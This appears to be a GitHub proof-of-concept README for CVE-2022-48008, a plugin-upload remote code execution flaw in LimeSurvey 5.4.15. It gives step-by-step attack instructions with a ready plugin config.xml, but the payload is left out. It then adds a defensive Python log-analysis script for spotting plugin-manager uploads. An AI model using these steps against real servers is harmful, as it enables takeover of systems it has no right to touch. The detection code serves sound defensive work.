CVE-2022-48008: GitHub - Sakura-501/LimeSurvey-5.4.15-PluginUploadtoRCE: In LimeSurvey5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE

An arbitrary file upload vulnerability in the plugin manager of LimeSurvey v5.4.15 allows attackers to execute arbitrary code via a crafted PHP file.

LimeSurvey-5.4.15-PluginUploadtoRCE

LimeSurvey 5.4.15 has a vulnerability in index.php/admin/pluginmanager that can lead to RCE.

Impact: Complete control of the system.

The directory structure of the files we need is as follows:

Here are the attack steps:

  1. Create a config.xml as follows, and remember the value of <name>, here exp:

    <?xml version="1.0" encoding="UTF-8"?>
    <config>
        <metadata>
            <name>exp</name>
            <type>plugin</type>
            <creationDate>2021-11-18</creationDate>
            <lastUpdate>2021-11-23</lastUpdate>
            <author>Denis Chenu (for Respondage)</author>
            <authorUrl>https://www.respondage.nl</authorUrl>
            <supportUrl>https://www.limesurvey.org</supportUrl>
            <version>0.2.1</version>
            <license>GNU General Public License version 3 or later</license>
            <description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description>
        </metadata>
        <compatibility>
            <version>5.0</version>
        </compatibility>
        <updaters disabled="disabled">
        </updaters>
    </config>

  2. Create a PHP file with the same name as the plugin (exp), exp.php, and put your payload in it, like the following example:

  3. Compress config.xml and exp.php into one archive, such as exp.zip:

  4. Upload exp.zip at /index.php/admin/pluginmanager?sa=index :

  5. Finally, when you click the uploaded plugin, the PHP payload is triggered:
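Steps 4 and 5 both pass through the plugin manager route, so a defender can review web server access logs for who reached it and who sent state-changing requests there. The following is an added example, not code from the original repository: it assumes combined-format access logs and that installs without path-style URLs carry the route in an r query parameter; the function names are hypothetical and the log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2023:09:14:02 +0000] "GET /index.php/admin/pluginmanager?sa=index HTTP/1.1" 200 18432 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2023:09:14:31 +0000] "POST /index.php/admin/pluginmanager HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2023:09:15:00 +0000] "GET /index.php/123456?lang=en HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2023:09:15:09 +0000] "POST /index.php/123456 HTTP/1.1" 200 9500 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jan/2023:09:16:12 +0000] "GET /index.php?r=admin%2Fpluginmanager&sa=index HTTP/1.1" 302 0 "-" "curl/8.0"
truncated or malformed line
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
ROUTE = "admin/pluginmanager"  # route named in the advisory
READ_ONLY = {"GET", "HEAD", "OPTIONS"}

def is_plugin_manager(target):
    """True if the request target addresses the plugin manager route."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # Assumption: installs without path-style URLs carry the route in ?r=
    r_param = parse_qs(parts.query).get("r", [""])[0].lower()
    return ROUTE in path or r_param.startswith(ROUTE)

def plugin_manager_events(log_text):
    """Parse the log and return one dict per plugin-manager request."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, when, method, target, status = m.groups()
        if is_plugin_manager(target):
            events.append({"ip": ip, "time": when, "method": method,
                           "target": target, "status": int(status),
                           "writes": method not in READ_ONLY})
    return events

def clients_to_review(events):
    """Count state-changing plugin-manager requests (uploads are POSTs) per IP."""
    return dict(Counter(e["ip"] for e in events if e["writes"]))

if __name__ == "__main__":
    print(clients_to_review(plugin_manager_events(SAMPLE_LOG)))
```

Any client listed by clients_to_review that is not a known administrator workstation is worth correlating with new directories under the LimeSurvey plugin upload location.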
